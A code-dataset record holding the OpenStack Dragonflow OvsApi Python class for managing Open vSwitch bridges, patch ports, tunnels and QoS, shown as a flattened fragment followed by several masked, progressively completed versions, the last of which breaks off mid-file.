bridge2, bridge1_link_name=None, bridge2_link_name=None): if bridge1_link_name is None: bridge1_link_name = "%s-patch" % bridge2 if bridge2_link_name is None: bridge2_link_name = "%s-patch" % bridge1 LOG.debug('genrated mappings {%(bridge1)s: %(link1)s,' ' %(bridge2)s: %(link2)s}', {'bridge1': bridge1, 'link1': bridge1_link_name, 'bridge2': bridge2, 
'link2': bridge2_link_name}) return (bridge1_link_name, bridge2_link_name) def map_patch_to_network(self, network, patch_name): self.bridge_mapping[network] = patch_name def get_phy_network_ofport(self, network): patch_name = self.bridge_mapping.get(network) if patch_name: return self.get_port_ofport(patch_name) def create_patch_pair(self, local_bridge, peer_bridge, local_link_name=None, peer_link_name=None): links = self._gen_link_mapping( local_bridge, peer_bridge, local_link_name, peer_link_name) self._create_patch_port( local_bridge, links[0], peer_bridge, links[1]) self._create_patch_port( peer_bridge, links[1], local_bridge, links[0]) return links def _create_patch_port(self, bridge, port, peer, peer_port): if cfg.CONF.df.enable_dpdk: self.ovsdb.add_br(bridge, datapath_type='netdev').execute() else: self.ovsdb.add_br(bridge, datapath_type='system').execute() if not self.patch_port_exist(port): self.ovsdb.add_patch_port(bridge, port, peer, peer_port).execute() def patch_port_exist(self, port): return 'patch' == self._db_get_val('Interface', port, 'type', check_error=False, log_errors=False) def get_port_ofport(self, port): return self._db_get_val('Interface', port, 'ofport', check_error=False, log_errors=False) def get_port_mac_in_use(self, port): return self._db_get_val('Interface', port, 'mac_in_use', check_error=False, log_errors=False) def get_port_qos(self, port_id): port_qoses = self.ovsdb.db_find( 'QoS', ('external_ids', '=', {'iface-id': port_id}), columns=['external_ids', '_uuid']).execute() if port_qoses: ovsdb_qos = port_qoses[0] external_ids = ovsdb_qos['external_ids'] return qos.QosPolicy( id=external_ids.get('qos-id'), topic=external_ids.get('qos-topic'), version=external_ids.get('version'), ) def set_port_qos(self, port_id, qos): port_name = self._get_port_name_by_id(port_id) if not port_name: return max_kbps = qos.get_max_kbps() max_burst_kbps = qos.get_max_burst_kbps() with self.ovsdb.transaction(check_error=True) as txn: qos_uuid = 
txn.add(self.ovsdb.create_qos(port_id, qos)) txn.add(self.ovsdb.db_set('Interface', port_name, ('ingress_policing_rate', max_kbps), ('ingress_policing_burst', max_burst_kbps))) txn.add(self.ovsdb.db_set('Port', port_name, ('qos', qos_uuid))) def update_port_qos(self, port_id, qos): port_name = self._get_port_name_by_id(port_id) if not port_name: return max_kbps = qos.get_max_kbps() max_burst_kbps = qos.get_max_burst_kbps() with self.ovsdb.transaction(check_error=True) as txn: txn.add(self.ovsdb.db_set('Interface', port_name, ('ingress_policing_rate', max_kbps), ('ingress_policing_burst', max_burst_kbps))) txn.add(self.ovsdb.update_qos(port_id, qos)) def clear_port_qos(self, port_id): port_name = self._get_port_name_by_id(port_id) if not port_name: return with self.ovsdb.transaction(check_error=True) as txn: txn.add(self.ovsdb.db_set('Interface', port_name, ('ingress_policing_rate', 0), ('ingress_policing_burst', 0))) txn.add(self.ovsdb.db_set('Port', port_name, ('qos', []))) txn.add(self.ovsdb.delete_qos(port_id)) def delete_port_qos_and_queue(self, port_id): self.ovsdb.delete_qos(port_id).execute() def get_vtp_ofport(self, tunnel_type): return self.get_port_ofport(tunnel_type + '-vtp')
normal
{ "blob_id": "89a3c34b3145b93a4cfa78eeb055c8136ab2bfe6", "index": 2084, "step-1": "<mask token>\n\n\nclass OvsApi(object):\n <mask token>\n\n def __init__(self, ip, protocol='tcp', port='6640', timeout=10):\n super(OvsApi, self).__init__()\n self.ip = ip\n self.protocol = protocol\n self.port = port\n self.vsctl_timeout = timeout\n self.ovsdb = None\n self.integration_bridge = cfg.CONF.df.integration_bridge\n if cfg.CONF.log_dir:\n vlog.Vlog.init(cfg.CONF.log_dir + '/' + OVS_LOG_FILE_NAME)\n else:\n vlog.Vlog.init()\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_controller_fail_mode(self, bridge, fail_mode):\n self.ovsdb.set_fail_mode(bridge, fail_mode).execute()\n <mask token>\n\n def check_controller_fail_mode(self, fail_mode):\n return fail_mode == self._db_get_val('Bridge', self.\n integration_bridge, 'fail_mode')\n\n def get_virtual_tunnel_ports(self):\n ifaces = self.ovsdb.db_find('Interface', ('options', '=', {\n 'remote_ip': 'flow'}), columns=['uuid', 'name', 'type']).execute()\n tunnel_ports = []\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n tunnel_ports.append(ovs.OvsPort(id=str(iface['uuid']), name=\n iface['name'], tunnel_type=iface['type']))\n return tunnel_ports\n\n def add_virtual_tunnel_port(self, tunnel_type):\n self.ovsdb.add_virtual_tunnel_port(tunnel_type).execute()\n\n def delete_port(self, switch_port):\n self.ovsdb.del_port(switch_port.name, self.integration_bridge).execute(\n )\n\n @staticmethod\n def _check_ofport(port_name, ofport):\n if ofport is None:\n LOG.warning(\"Can't find ofport for port %s.\", port_name)\n return False\n if ofport < OFPORT_RANGE_MIN or ofport > OFPORT_RANGE_MAX:\n LOG.warning('ofport %(ofport)s for port %(port)s is invalid.',\n {'ofport': ofport, 'port': port_name})\n return False\n return True\n\n def get_interface_by_id_with_specified_columns(self, port_id,\n specified_columns):\n columns = {'external_ids', 'name'}\n 
columns.update(specified_columns)\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=columns).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface\n <mask token>\n\n def get_local_port_mac_in_use(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(port_id, {\n 'mac_in_use'})\n if iface and netaddr.valid_mac(iface['mac_in_use']):\n return iface['mac_in_use']\n\n def _get_port_name_by_id(self, port_id):\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', 'name']).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface['name']\n <mask token>\n\n def map_patch_to_network(self, network, patch_name):\n self.bridge_mapping[network] = patch_name\n\n def get_phy_network_ofport(self, network):\n patch_name = self.bridge_mapping.get(network)\n if patch_name:\n return self.get_port_ofport(patch_name)\n\n def create_patch_pair(self, local_bridge, peer_bridge, local_link_name=\n None, peer_link_name=None):\n links = self._gen_link_mapping(local_bridge, peer_bridge,\n local_link_name, peer_link_name)\n self._create_patch_port(local_bridge, links[0], peer_bridge, links[1])\n self._create_patch_port(peer_bridge, links[1], local_bridge, links[0])\n return links\n <mask token>\n <mask token>\n\n def get_port_ofport(self, port):\n return self._db_get_val('Interface', port, 'ofport', check_error=\n False, log_errors=False)\n\n def get_port_mac_in_use(self, port):\n return self._db_get_val('Interface', port, 'mac_in_use',\n check_error=False, log_errors=False)\n\n def get_port_qos(self, port_id):\n port_qoses = self.ovsdb.db_find('QoS', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', '_uuid']).execute()\n if port_qoses:\n ovsdb_qos = port_qoses[0]\n external_ids = 
ovsdb_qos['external_ids']\n return qos.QosPolicy(id=external_ids.get('qos-id'), topic=\n external_ids.get('qos-topic'), version=external_ids.get(\n 'version'))\n <mask token>\n\n def update_port_qos(self, port_id, qos):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n max_kbps = qos.get_max_kbps()\n max_burst_kbps = qos.get_max_burst_kbps()\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name, (\n 'ingress_policing_rate', max_kbps), (\n 'ingress_policing_burst', max_burst_kbps)))\n txn.add(self.ovsdb.update_qos(port_id, qos))\n <mask token>\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass OvsApi(object):\n <mask token>\n\n def __init__(self, ip, protocol='tcp', port='6640', timeout=10):\n super(OvsApi, self).__init__()\n self.ip = ip\n self.protocol = protocol\n self.port = port\n self.vsctl_timeout = timeout\n self.ovsdb = None\n self.integration_bridge = cfg.CONF.df.integration_bridge\n if cfg.CONF.log_dir:\n vlog.Vlog.init(cfg.CONF.log_dir + '/' + OVS_LOG_FILE_NAME)\n else:\n vlog.Vlog.init()\n\n def initialize(self, nb_api):\n db_connection = '%s:%s:%s' % (self.protocol, self.ip, self.port)\n nb_api.db_change_callback(None, None, constants.\n CONTROLLER_OVS_SYNC_STARTED, None)\n self.ovsdb = impl_idl.DFOvsdbApi(nb_api, db_connection, self.\n vsctl_timeout)\n nb_api.db_change_callback(None, None, constants.\n CONTROLLER_OVS_SYNC_FINISHED, None)\n\n def _db_get_val(self, table, record, column, check_error=False,\n log_errors=True):\n return self.ovsdb.db_get(table, record, column).execute(check_error\n =check_error, log_errors=log_errors)\n <mask token>\n\n def set_controller(self, bridge, targets):\n self.ovsdb.set_controller(bridge, targets).execute()\n\n def set_controller_fail_mode(self, bridge, fail_mode):\n self.ovsdb.set_fail_mode(bridge, fail_mode).execute()\n <mask token>\n\n def check_controller_fail_mode(self, fail_mode):\n return fail_mode == 
self._db_get_val('Bridge', self.\n integration_bridge, 'fail_mode')\n\n def get_virtual_tunnel_ports(self):\n ifaces = self.ovsdb.db_find('Interface', ('options', '=', {\n 'remote_ip': 'flow'}), columns=['uuid', 'name', 'type']).execute()\n tunnel_ports = []\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n tunnel_ports.append(ovs.OvsPort(id=str(iface['uuid']), name=\n iface['name'], tunnel_type=iface['type']))\n return tunnel_ports\n\n def add_virtual_tunnel_port(self, tunnel_type):\n self.ovsdb.add_virtual_tunnel_port(tunnel_type).execute()\n\n def delete_port(self, switch_port):\n self.ovsdb.del_port(switch_port.name, self.integration_bridge).execute(\n )\n\n @staticmethod\n def _check_ofport(port_name, ofport):\n if ofport is None:\n LOG.warning(\"Can't find ofport for port %s.\", port_name)\n return False\n if ofport < OFPORT_RANGE_MIN or ofport > OFPORT_RANGE_MAX:\n LOG.warning('ofport %(ofport)s for port %(port)s is invalid.',\n {'ofport': ofport, 'port': port_name})\n return False\n return True\n\n def get_interface_by_id_with_specified_columns(self, port_id,\n specified_columns):\n columns = {'external_ids', 'name'}\n columns.update(specified_columns)\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=columns).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface\n <mask token>\n\n def get_local_port_mac_in_use(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(port_id, {\n 'mac_in_use'})\n if iface and netaddr.valid_mac(iface['mac_in_use']):\n return iface['mac_in_use']\n\n def _get_port_name_by_id(self, port_id):\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', 'name']).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 
'name']):\n continue\n return iface['name']\n\n def _gen_link_mapping(self, bridge1, bridge2, bridge1_link_name=None,\n bridge2_link_name=None):\n if bridge1_link_name is None:\n bridge1_link_name = '%s-patch' % bridge2\n if bridge2_link_name is None:\n bridge2_link_name = '%s-patch' % bridge1\n LOG.debug(\n 'genrated mappings {%(bridge1)s: %(link1)s, %(bridge2)s: %(link2)s}'\n , {'bridge1': bridge1, 'link1': bridge1_link_name, 'bridge2':\n bridge2, 'link2': bridge2_link_name})\n return bridge1_link_name, bridge2_link_name\n\n def map_patch_to_network(self, network, patch_name):\n self.bridge_mapping[network] = patch_name\n\n def get_phy_network_ofport(self, network):\n patch_name = self.bridge_mapping.get(network)\n if patch_name:\n return self.get_port_ofport(patch_name)\n\n def create_patch_pair(self, local_bridge, peer_bridge, local_link_name=\n None, peer_link_name=None):\n links = self._gen_link_mapping(local_bridge, peer_bridge,\n local_link_name, peer_link_name)\n self._create_patch_port(local_bridge, links[0], peer_bridge, links[1])\n self._create_patch_port(peer_bridge, links[1], local_bridge, links[0])\n return links\n <mask token>\n <mask token>\n\n def get_port_ofport(self, port):\n return self._db_get_val('Interface', port, 'ofport', check_error=\n False, log_errors=False)\n\n def get_port_mac_in_use(self, port):\n return self._db_get_val('Interface', port, 'mac_in_use',\n check_error=False, log_errors=False)\n\n def get_port_qos(self, port_id):\n port_qoses = self.ovsdb.db_find('QoS', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', '_uuid']).execute()\n if port_qoses:\n ovsdb_qos = port_qoses[0]\n external_ids = ovsdb_qos['external_ids']\n return qos.QosPolicy(id=external_ids.get('qos-id'), topic=\n external_ids.get('qos-topic'), version=external_ids.get(\n 'version'))\n <mask token>\n\n def update_port_qos(self, port_id, qos):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n max_kbps = 
qos.get_max_kbps()\n max_burst_kbps = qos.get_max_burst_kbps()\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name, (\n 'ingress_policing_rate', max_kbps), (\n 'ingress_policing_burst', max_burst_kbps)))\n txn.add(self.ovsdb.update_qos(port_id, qos))\n\n def clear_port_qos(self, port_id):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name, (\n 'ingress_policing_rate', 0), ('ingress_policing_burst', 0)))\n txn.add(self.ovsdb.db_set('Port', port_name, ('qos', [])))\n txn.add(self.ovsdb.delete_qos(port_id))\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass OvsApi(object):\n <mask token>\n\n def __init__(self, ip, protocol='tcp', port='6640', timeout=10):\n super(OvsApi, self).__init__()\n self.ip = ip\n self.protocol = protocol\n self.port = port\n self.vsctl_timeout = timeout\n self.ovsdb = None\n self.integration_bridge = cfg.CONF.df.integration_bridge\n if cfg.CONF.log_dir:\n vlog.Vlog.init(cfg.CONF.log_dir + '/' + OVS_LOG_FILE_NAME)\n else:\n vlog.Vlog.init()\n\n def initialize(self, nb_api):\n db_connection = '%s:%s:%s' % (self.protocol, self.ip, self.port)\n nb_api.db_change_callback(None, None, constants.\n CONTROLLER_OVS_SYNC_STARTED, None)\n self.ovsdb = impl_idl.DFOvsdbApi(nb_api, db_connection, self.\n vsctl_timeout)\n nb_api.db_change_callback(None, None, constants.\n CONTROLLER_OVS_SYNC_FINISHED, None)\n\n def _db_get_val(self, table, record, column, check_error=False,\n log_errors=True):\n return self.ovsdb.db_get(table, record, column).execute(check_error\n =check_error, log_errors=log_errors)\n <mask token>\n\n def set_controller(self, bridge, targets):\n self.ovsdb.set_controller(bridge, targets).execute()\n\n def set_controller_fail_mode(self, bridge, fail_mode):\n self.ovsdb.set_fail_mode(bridge, fail_mode).execute()\n\n def 
check_controller(self, target):\n controllers = self.ovsdb.get_controller(self.integration_bridge\n ).execute()\n return target in controllers\n\n def check_controller_fail_mode(self, fail_mode):\n return fail_mode == self._db_get_val('Bridge', self.\n integration_bridge, 'fail_mode')\n\n def get_virtual_tunnel_ports(self):\n ifaces = self.ovsdb.db_find('Interface', ('options', '=', {\n 'remote_ip': 'flow'}), columns=['uuid', 'name', 'type']).execute()\n tunnel_ports = []\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n tunnel_ports.append(ovs.OvsPort(id=str(iface['uuid']), name=\n iface['name'], tunnel_type=iface['type']))\n return tunnel_ports\n\n def add_virtual_tunnel_port(self, tunnel_type):\n self.ovsdb.add_virtual_tunnel_port(tunnel_type).execute()\n\n def delete_port(self, switch_port):\n self.ovsdb.del_port(switch_port.name, self.integration_bridge).execute(\n )\n\n @staticmethod\n def _check_ofport(port_name, ofport):\n if ofport is None:\n LOG.warning(\"Can't find ofport for port %s.\", port_name)\n return False\n if ofport < OFPORT_RANGE_MIN or ofport > OFPORT_RANGE_MAX:\n LOG.warning('ofport %(ofport)s for port %(port)s is invalid.',\n {'ofport': ofport, 'port': port_name})\n return False\n return True\n\n def get_interface_by_id_with_specified_columns(self, port_id,\n specified_columns):\n columns = {'external_ids', 'name'}\n columns.update(specified_columns)\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=columns).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface\n\n def get_port_ofport_by_id(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(port_id, {\n 'name', 'ofport'})\n if iface and self._check_ofport(iface['name'], iface['ofport']):\n return iface['ofport']\n\n def get_local_port_mac_in_use(self, port_id):\n iface = 
self.get_interface_by_id_with_specified_columns(port_id, {\n 'mac_in_use'})\n if iface and netaddr.valid_mac(iface['mac_in_use']):\n return iface['mac_in_use']\n\n def _get_port_name_by_id(self, port_id):\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', 'name']).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface['name']\n\n def _gen_link_mapping(self, bridge1, bridge2, bridge1_link_name=None,\n bridge2_link_name=None):\n if bridge1_link_name is None:\n bridge1_link_name = '%s-patch' % bridge2\n if bridge2_link_name is None:\n bridge2_link_name = '%s-patch' % bridge1\n LOG.debug(\n 'genrated mappings {%(bridge1)s: %(link1)s, %(bridge2)s: %(link2)s}'\n , {'bridge1': bridge1, 'link1': bridge1_link_name, 'bridge2':\n bridge2, 'link2': bridge2_link_name})\n return bridge1_link_name, bridge2_link_name\n\n def map_patch_to_network(self, network, patch_name):\n self.bridge_mapping[network] = patch_name\n\n def get_phy_network_ofport(self, network):\n patch_name = self.bridge_mapping.get(network)\n if patch_name:\n return self.get_port_ofport(patch_name)\n\n def create_patch_pair(self, local_bridge, peer_bridge, local_link_name=\n None, peer_link_name=None):\n links = self._gen_link_mapping(local_bridge, peer_bridge,\n local_link_name, peer_link_name)\n self._create_patch_port(local_bridge, links[0], peer_bridge, links[1])\n self._create_patch_port(peer_bridge, links[1], local_bridge, links[0])\n return links\n <mask token>\n <mask token>\n\n def get_port_ofport(self, port):\n return self._db_get_val('Interface', port, 'ofport', check_error=\n False, log_errors=False)\n\n def get_port_mac_in_use(self, port):\n return self._db_get_val('Interface', port, 'mac_in_use',\n check_error=False, log_errors=False)\n\n def get_port_qos(self, port_id):\n port_qoses = self.ovsdb.db_find('QoS', ('external_ids', '=', {\n 'iface-id': 
port_id}), columns=['external_ids', '_uuid']).execute()\n if port_qoses:\n ovsdb_qos = port_qoses[0]\n external_ids = ovsdb_qos['external_ids']\n return qos.QosPolicy(id=external_ids.get('qos-id'), topic=\n external_ids.get('qos-topic'), version=external_ids.get(\n 'version'))\n <mask token>\n\n def update_port_qos(self, port_id, qos):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n max_kbps = qos.get_max_kbps()\n max_burst_kbps = qos.get_max_burst_kbps()\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name, (\n 'ingress_policing_rate', max_kbps), (\n 'ingress_policing_burst', max_burst_kbps)))\n txn.add(self.ovsdb.update_qos(port_id, qos))\n\n def clear_port_qos(self, port_id):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name, (\n 'ingress_policing_rate', 0), ('ingress_policing_burst', 0)))\n txn.add(self.ovsdb.db_set('Port', port_name, ('qos', [])))\n txn.add(self.ovsdb.delete_qos(port_id))\n <mask token>\n <mask token>\n", "step-4": "<mask token>\n\n\nclass OvsApi(object):\n <mask token>\n\n def __init__(self, ip, protocol='tcp', port='6640', timeout=10):\n super(OvsApi, self).__init__()\n self.ip = ip\n self.protocol = protocol\n self.port = port\n self.vsctl_timeout = timeout\n self.ovsdb = None\n self.integration_bridge = cfg.CONF.df.integration_bridge\n if cfg.CONF.log_dir:\n vlog.Vlog.init(cfg.CONF.log_dir + '/' + OVS_LOG_FILE_NAME)\n else:\n vlog.Vlog.init()\n\n def initialize(self, nb_api):\n db_connection = '%s:%s:%s' % (self.protocol, self.ip, self.port)\n nb_api.db_change_callback(None, None, constants.\n CONTROLLER_OVS_SYNC_STARTED, None)\n self.ovsdb = impl_idl.DFOvsdbApi(nb_api, db_connection, self.\n vsctl_timeout)\n nb_api.db_change_callback(None, None, constants.\n CONTROLLER_OVS_SYNC_FINISHED, None)\n\n def _db_get_val(self, 
table, record, column, check_error=False,\n log_errors=True):\n return self.ovsdb.db_get(table, record, column).execute(check_error\n =check_error, log_errors=log_errors)\n <mask token>\n\n def set_controller(self, bridge, targets):\n self.ovsdb.set_controller(bridge, targets).execute()\n\n def set_controller_fail_mode(self, bridge, fail_mode):\n self.ovsdb.set_fail_mode(bridge, fail_mode).execute()\n\n def check_controller(self, target):\n controllers = self.ovsdb.get_controller(self.integration_bridge\n ).execute()\n return target in controllers\n\n def check_controller_fail_mode(self, fail_mode):\n return fail_mode == self._db_get_val('Bridge', self.\n integration_bridge, 'fail_mode')\n\n def get_virtual_tunnel_ports(self):\n ifaces = self.ovsdb.db_find('Interface', ('options', '=', {\n 'remote_ip': 'flow'}), columns=['uuid', 'name', 'type']).execute()\n tunnel_ports = []\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n tunnel_ports.append(ovs.OvsPort(id=str(iface['uuid']), name=\n iface['name'], tunnel_type=iface['type']))\n return tunnel_ports\n\n def add_virtual_tunnel_port(self, tunnel_type):\n self.ovsdb.add_virtual_tunnel_port(tunnel_type).execute()\n\n def delete_port(self, switch_port):\n self.ovsdb.del_port(switch_port.name, self.integration_bridge).execute(\n )\n\n @staticmethod\n def _check_ofport(port_name, ofport):\n if ofport is None:\n LOG.warning(\"Can't find ofport for port %s.\", port_name)\n return False\n if ofport < OFPORT_RANGE_MIN or ofport > OFPORT_RANGE_MAX:\n LOG.warning('ofport %(ofport)s for port %(port)s is invalid.',\n {'ofport': ofport, 'port': port_name})\n return False\n return True\n\n def get_interface_by_id_with_specified_columns(self, port_id,\n specified_columns):\n columns = {'external_ids', 'name'}\n columns.update(specified_columns)\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=columns).execute()\n for 
iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface\n\n def get_port_ofport_by_id(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(port_id, {\n 'name', 'ofport'})\n if iface and self._check_ofport(iface['name'], iface['ofport']):\n return iface['ofport']\n\n def get_local_port_mac_in_use(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(port_id, {\n 'mac_in_use'})\n if iface and netaddr.valid_mac(iface['mac_in_use']):\n return iface['mac_in_use']\n\n def _get_port_name_by_id(self, port_id):\n ifaces = self.ovsdb.db_find('Interface', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', 'name']).execute()\n for iface in ifaces:\n if self.integration_bridge != self._get_bridge_for_iface(iface[\n 'name']):\n continue\n return iface['name']\n\n def _gen_link_mapping(self, bridge1, bridge2, bridge1_link_name=None,\n bridge2_link_name=None):\n if bridge1_link_name is None:\n bridge1_link_name = '%s-patch' % bridge2\n if bridge2_link_name is None:\n bridge2_link_name = '%s-patch' % bridge1\n LOG.debug(\n 'genrated mappings {%(bridge1)s: %(link1)s, %(bridge2)s: %(link2)s}'\n , {'bridge1': bridge1, 'link1': bridge1_link_name, 'bridge2':\n bridge2, 'link2': bridge2_link_name})\n return bridge1_link_name, bridge2_link_name\n\n def map_patch_to_network(self, network, patch_name):\n self.bridge_mapping[network] = patch_name\n\n def get_phy_network_ofport(self, network):\n patch_name = self.bridge_mapping.get(network)\n if patch_name:\n return self.get_port_ofport(patch_name)\n\n def create_patch_pair(self, local_bridge, peer_bridge, local_link_name=\n None, peer_link_name=None):\n links = self._gen_link_mapping(local_bridge, peer_bridge,\n local_link_name, peer_link_name)\n self._create_patch_port(local_bridge, links[0], peer_bridge, links[1])\n self._create_patch_port(peer_bridge, links[1], local_bridge, links[0])\n return links\n\n def 
_create_patch_port(self, bridge, port, peer, peer_port):\n if cfg.CONF.df.enable_dpdk:\n self.ovsdb.add_br(bridge, datapath_type='netdev').execute()\n else:\n self.ovsdb.add_br(bridge, datapath_type='system').execute()\n if not self.patch_port_exist(port):\n self.ovsdb.add_patch_port(bridge, port, peer, peer_port).execute()\n <mask token>\n\n def get_port_ofport(self, port):\n return self._db_get_val('Interface', port, 'ofport', check_error=\n False, log_errors=False)\n\n def get_port_mac_in_use(self, port):\n return self._db_get_val('Interface', port, 'mac_in_use',\n check_error=False, log_errors=False)\n\n def get_port_qos(self, port_id):\n port_qoses = self.ovsdb.db_find('QoS', ('external_ids', '=', {\n 'iface-id': port_id}), columns=['external_ids', '_uuid']).execute()\n if port_qoses:\n ovsdb_qos = port_qoses[0]\n external_ids = ovsdb_qos['external_ids']\n return qos.QosPolicy(id=external_ids.get('qos-id'), topic=\n external_ids.get('qos-topic'), version=external_ids.get(\n 'version'))\n <mask token>\n\n def update_port_qos(self, port_id, qos):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n max_kbps = qos.get_max_kbps()\n max_burst_kbps = qos.get_max_burst_kbps()\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name, (\n 'ingress_policing_rate', max_kbps), (\n 'ingress_policing_burst', max_burst_kbps)))\n txn.add(self.ovsdb.update_qos(port_id, qos))\n\n def clear_port_qos(self, port_id):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name, (\n 'ingress_policing_rate', 0), ('ingress_policing_burst', 0)))\n txn.add(self.ovsdb.db_set('Port', port_name, ('qos', [])))\n txn.add(self.ovsdb.delete_qos(port_id))\n <mask token>\n\n def get_vtp_ofport(self, tunnel_type):\n return self.get_port_ofport(tunnel_type + '-vtp')\n", "step-5": "# Copyright (c) 
2015 OpenStack Foundation.\n#\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport netaddr\nfrom oslo_config import cfg\nfrom oslo_log import log\nfrom ovs import vlog\n\nfrom dragonflow.controller.common import constants\nfrom dragonflow.db.models import ovs\nfrom dragonflow.db.models import qos\nfrom dragonflow.ovsdb import impl_idl\n\nLOG = log.getLogger(__name__)\n\nOFPORT_RANGE_MIN = 1\nOFPORT_RANGE_MAX = 65533\n\nOVS_LOG_FILE_NAME = 'df-ovs.log'\n\n\nclass OvsApi(object):\n \"\"\"The interface of openvswitch\n\n Consumers use this class to set openvswitch or get results from\n openvswitch.\n \"\"\"\n\n def __init__(self, ip, protocol='tcp', port='6640', timeout=10):\n super(OvsApi, self).__init__()\n self.ip = ip\n self.protocol = protocol\n self.port = port\n # NOTE: This has to be this name vsctl_timeout, as neutron will use\n # this attribute to set the timeout of ovs db.\n self.vsctl_timeout = timeout\n self.ovsdb = None\n self.integration_bridge = cfg.CONF.df.integration_bridge\n if cfg.CONF.log_dir:\n vlog.Vlog.init(cfg.CONF.log_dir + '/' + OVS_LOG_FILE_NAME)\n else:\n vlog.Vlog.init()\n\n def initialize(self, nb_api):\n db_connection = ('%s:%s:%s' % (self.protocol, self.ip, self.port))\n\n nb_api.db_change_callback(None, None,\n constants.CONTROLLER_OVS_SYNC_STARTED, None)\n\n self.ovsdb = impl_idl.DFOvsdbApi(\n nb_api, db_connection, self.vsctl_timeout)\n\n nb_api.db_change_callback(None, None,\n 
constants.CONTROLLER_OVS_SYNC_FINISHED, None)\n\n def _db_get_val(self, table, record, column, check_error=False,\n log_errors=True):\n return self.ovsdb.db_get(table, record, column).execute(\n check_error=check_error, log_errors=log_errors)\n\n def _get_bridge_for_iface(self, iface_name):\n return self.ovsdb.iface_to_br(iface_name).execute()\n\n def set_controller(self, bridge, targets):\n self.ovsdb.set_controller(bridge, targets).execute()\n\n def set_controller_fail_mode(self, bridge, fail_mode):\n self.ovsdb.set_fail_mode(bridge, fail_mode).execute()\n\n def check_controller(self, target):\n controllers = self.ovsdb.get_controller(\n self.integration_bridge).execute()\n return target in controllers\n\n def check_controller_fail_mode(self, fail_mode):\n return fail_mode == self._db_get_val('Bridge',\n self.integration_bridge,\n 'fail_mode')\n\n def get_virtual_tunnel_ports(self):\n ifaces = self.ovsdb.db_find(\n 'Interface', ('options', '=', {'remote_ip': 'flow'}),\n columns=['uuid', 'name', 'type']).execute()\n tunnel_ports = []\n for iface in ifaces:\n if (self.integration_bridge !=\n self._get_bridge_for_iface(iface['name'])):\n continue\n\n tunnel_ports.append(\n ovs.OvsPort(\n id=str(iface['uuid']),\n name=iface['name'],\n tunnel_type=iface['type'],\n ),\n )\n\n return tunnel_ports\n\n def add_virtual_tunnel_port(self, tunnel_type):\n self.ovsdb.add_virtual_tunnel_port(tunnel_type).execute()\n\n def delete_port(self, switch_port):\n self.ovsdb.del_port(switch_port.name,\n self.integration_bridge).execute()\n\n @staticmethod\n def _check_ofport(port_name, ofport):\n if ofport is None:\n LOG.warning(\"Can't find ofport for port %s.\", port_name)\n return False\n if ofport < OFPORT_RANGE_MIN or ofport > 